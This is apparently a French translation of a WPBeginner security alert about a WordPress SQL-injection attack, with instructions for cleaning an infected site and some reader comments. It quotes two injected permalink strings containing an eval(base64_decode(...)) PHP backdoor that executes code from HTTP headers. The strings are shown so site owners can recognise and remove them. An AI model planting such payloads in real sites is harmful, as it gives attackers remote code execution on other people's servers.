Trusted WordPress tutorials, when you need them most.
Beginner’s Guide to WordPress
Coupe WPB
25 Million+
Websites using our plugins
16+
Years of WordPress experience
3000+
WordPress tutorials
by experts

Injection SQL de WordPress – Dernière attaque

Note éditoriale : Nous percevons une commission sur les liens des partenaires sur WPBeginner. Les commissions n'affectent pas les opinions ou les évaluations de nos rédacteurs. En savoir plus sur Processus éditorial.

De nombreux sites sont touchés par une récente attaque SQL où des codes sont injectés dans votre site. Cette injection MySQL affecte vos permaliens en les rendant inefficaces. Par conséquent, les URLs de vos publications de blog ne fonctionneront pas. De nombreux blogs WordPress ont été visés par cette attaque. Merci à Andy Soward d’avoir attiré notre attention sur ce problème.

L’un des codes suivants a été ajouté à votre structure permalienne suite à cette attaque :

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Ces guillemets ont ajouté tous les permaliens de votre site et ils peuvent être modifiés uniquement s’ils sont retirés manuellement.

Pour corriger ce problème, rendez-vous à l’adresse suivante :

Réglages > Permaliens et supprimez le code ci-dessus et remplacez le code par défaut.

La prochaine chose à faire est d’aller dans Utilisatrices/utilisateurs. Vous verrez qu’il y a plus d’une administratrice/administratrice. Vous ne verrez pas leur nom listé, mais vous verrez le compte augmenté. La dernière chose à faire est de regarder tous les utilisateurs/utilisatrices et de trouver la dernière personne qui s’est inscrite. Placez votre souris sur cet utilisateur/utilisatrice et obtenez le lien. Modifiez le code userid= en ajoutant 1 à ce nombre. Ainsi, si le dernier utilisateur/utilisatrice que vous pouvez voir était l’utilisateur/utilisatrice n°2, ajoutez 1 à ce chiffre et vous obtiendrez 3. Vous devriez trouver que l’administrateur masqué a un code bizarre comme prénom. Supprimez le code et faites-en un abonné/abonné. Ensuite, revenez et supprimez-le.

Cela devrait corriger le problème. Vous pouvez également le supprimer en allant simplement dans votre PHPMyAdmin. Vous y verrez l’utilisateur/utilisatrice.

Nous voulions simplement diffuser cette nouvelle dès que possible, afin que nos utilisateurs/utilisatrices puissent être mis au courant. Veuillez vous assurer que votre blog n’est pas infecté. Nous espérons que WordPress publiera une version bientôt disponible.

Si vous ne l’avez pas encore fait, mettez en œuvre certaines de ces mesures pour sécuriser votre zone d’administration WordPress.

Divulgation : Notre contenu est soutenu par les lecteurs. Cela signifie que si vous cliquez sur certains de nos liens, nous pouvons gagner une commission. Consultez comment WPBeginner est financé, pourquoi cela compte et comment vous pouvez nous soutenir. Voici notre processus éditorial.

Avatar

Editorial Staff at WPBeginner is a team of WordPress experts led by Syed Balkhi with over 16 years of experience in WordPress, Web Hosting, eCommerce, SEO, and Marketing. Started in 2009, WPBeginner is now the largest free WordPress resource site in the industry and is often referred to as the Wikipedia for WordPress.

L'ultime WordPress Toolkit

Accédez GRATUITEMENT à notre boîte à outils - une collection de produits et de ressources liés à WordPress que tous les professionnels devraient avoir !

Reader Interactions

9 commentairesLaisser une réponse

  1. Syed Balkhi says

    Hey WPBeginner readers,
    Did you know you can win exciting prizes by commenting on WPBeginner?
    Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
    You can get more details about the contest from here.
    Start sharing your thoughts below to stand a chance to win!

  2. ahmed_alaaedin says

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

  3. a wordpress user says

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    • Editorial Staff says

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Administrateur

      • lerrkin says

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was « Page not cached by WP Super Cache. No closing HTML tag. Check your theme ».
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

Laisser une réponse

Merci d'avoir choisi de laisser un commentaire. Veuillez garder à l'esprit que tous les commentaires sont modérés selon notre politique de commentaires, et votre adresse e-mail ne sera PAS publiée. Veuillez NE PAS utiliser de mots-clés dans le champ du nom. Ayons une conversation personnelle et significative.